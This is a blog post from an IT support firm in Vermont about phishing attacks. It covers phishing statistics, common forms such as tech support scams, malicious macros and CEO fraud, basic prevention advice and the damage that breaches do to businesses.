Skip to main content

Recent data indicates that nearly 3/4 of organizations around the world experienced a phishing attack in 2020. What’s more worrying is that 74% of attacks targeting US businesses were successful. According to a study by APWG, webmail and Software-as-a-Service (SaaS) users were the worst affected with 34.7% phishing attacks targeted at them. Google Safe Browsing data indicates that there are now nearly 75 times as many phishing sites as there are malware sites on the Internet. All of which points to the fact that phishing attacks are not going away anytime soon. Whether the victim is Hillary Clinton’s campaign manager, John Podesta, compromising his Gmail password; Walter Stephan, an Austrian aerospace executive, getting scammed out of $47 million; or a breach at Target affecting 110 million customers – the wealth of phishing attack examples shows us that they can happen to anyone at any time. The only way for businesses to stay safe from phishing attacks is to prevent them from happening in the first place. IT Support Vermont can be a great resource to start protecting your business from phishing attacks.

What is Phishing?

Phishing is a cyberattack that attempts to trick online users into believing a fraudulent message that can be sent through a wide range of delivery methods (email is the most popular) and compromising themselves and organizations that they work for. Phishing attempts can be aimed at getting users to click on malicious links for attachments, entering their sensitive information (such as credentials, personally identifiable information, financial information and more) on spoofed websites, and more. This form of cyber-attack is famous for disguising itself as some of the most commonplace and trusted sources by the victims. Some phishing attacks are so sophisticated that it takes the trained eyes of cyber security professionals to distinguish between an original mail from a trusted source and the phishing email/ spoofed website. Phishing attacks could potentially purport to be an email/ message/ call from the victim’s bank or social media accounts or an attachment from a colleague or a senior business leader. Email phishing attacks are by far the most common with 96% of social engineering attacks delivered by email, followed by 3% through a website, and 1% with phone or SMS communications and malicious documents.

Most common forms of phishing attacks include:

Tech Support Scams

As cyber-attacks have become more prevalent, it has become common for technical support teams to send out emails whenever they notice unusual activities on a user’s account. Hackers take advantage of this by sending out spoofed emails that apparently contain emergency alerts. Users are bound to pay attention to these kinds of alerts and often end up clicking on them without paying much attention. One way of staying safe from technical support scams is to simply hover over the link or phone number that you are being directed to and check if it seems genuine. Users should also pay close attention to the address and grammatical accuracy of the message.

Infected Attachments

Malicious .HTML attachments aren’t often detected by antivirus solutions since .HTML files are not a common threat source. However, these attachments are often used by banks and other financial institutions and can serve as highly effective attack delivery mechanisms.

Macros with Payloads

Malicious macros in phishing emails are a very common way of delivering ransomware attacks. These are also capable of flying under the radar of anti-virus programs. They generally pretend to be highly urgent and urge users to take action immediately.

Social Media Exploits

Social media platforms like Facebook and Instagram are often targeted by hackers to deliver malicious messages in the user’s inbox. It’s incredibly easy for hackers to pretend to be a user known to the victim and the messages often contain links or a single. SVG (Scaleable Vector Graphic) image file which can bypass Facebook’s file extensions filter. The bait used is often a piece of viral media content (video or image) or alerts about unusual activity on the victim’s account. When users click on the link they are redirected to malicious links or spoofed pages where they can be asked to install seemingly harmless additional pieces of software (such as browser extensions) to access the content. Once installed, a malicious extension can be used to exploit the user’s Facebook account. In some attacks, the embedded JavaScript can also trigger a trojan downloader that can deliver malicious payloads. Hackers can also scrape social media accounts in order to launch a Spear Phishing Attack.

LinkedIn Phishing Attacks

The wealth of personal and professional information shared on LinkedIn makes it a lucrative target for phishing attacks. Hackers can mine that data to choose potential victims and carefully design social engineering tactics to launch business email compromise attacks including wire transfer and W-2 social engineering scams, credentials scams and more.

CEO Fraud Scams

These attacks become increasingly common where employees are sent emails that are apparently from a senior business leader, often the CEO, CFO or CTO. As this kind of messages tend to get immediate attention/ action, users can be often duped into acting faster (and with less caution).

IT Outsourcing Vermont can help you shore up your business’ defenses from all kinds of phishing attacks.

How do phishing attacks work?

Phishing makes use of the generally trusting nature of people and their distraction in order to elicit a response. The worst attacks can hardly be distinguished from an actual message from a trusted entity (or person) the victim is likely to transact with. The dark web is full of ready-to-use phishing kits that can be used by hackers even with negligible technical skills.

Phishing attack prevention is not impossible. Companies need to prioritize employee cybersecurity education to identify phishing attacks, install advanced security solutions and implement policies that can effectively block phishing attempts and protect the business. It also requires users to pay close attention. For instance, users should always examine hypertext links on any email client to identify a phishing attack. Always hover over hyperlinks and anchor texts to check if the destination URL link matches the one in the email. Be wary of abbreviated links or links with strange characters.

How can phishing affect a business?

Data Loss

Clicking on a malicious link in an email can render an entire organization’s network and data vulnerable. Hackers are then free to commit data theft, modification, corruption, and deletion. They can hold the company at ransom and choose to sell or publicly disclose sensitive information. Sometimes, the data loss can be so tremendous that the company is unable to survive the attack.

Reputation Damage

Data breaches affect the reputation of companies nearly as much as financial scandals or other such outrages. The loss of trust from consumers and shareholders alike can often be permanent and even trigger public backlashes.

Direct Monetary Loss

Any successful breach can lead to direct monetary loss. This is further followed by a period of paying for mandatory analysis of the attack, damages that include fines and compensation for customers or employees, identity protection management and more.

Productivity Loss

Data breaches also cause significant business disruption. The targeted organization is forced to spend time and resources to recover lost data, investigating the breach and managing damages. With most business systems partially or completely offline, employee productivity takes a hit.

Loss of Customers

Data breaches and phishing attacks can scare customers away for good. Many simply refuse to associate with a business that has failed to protect its customers’ trust and data.

Financial Penalties

Violating regulatory requirements such as HIPAA, PCI, and European GDPR can attract heavy fines. In addition, breach of sensitive customer/ employee data results in both compensation and heavy regulatory fines.

Intellectual Property Theft

Phishing attacks can often target intellectual property that may be potentially more expensive than direct financial losses from the attack. This could include new technology and trade secrets that takes years of heavy investment and research and development. This could render the company less competitive.

Loss of Company Value

Loss of investor confidence following a breach can result in the evaporation of a company’s market value.

Steve Loyer

Steve Loyer

With over 25 years of sales and service experience in network and network security solutions, Steve has earned technical and sales certificates from Microsoft, Cisco, Hewlett Packard, Citrix, Sonicwall, Symantec, McAfee, Barracuda and American Power Conversion. Steve graduated from Vermont Technical College with a degree in Electrical and Electronics Engineering Technology.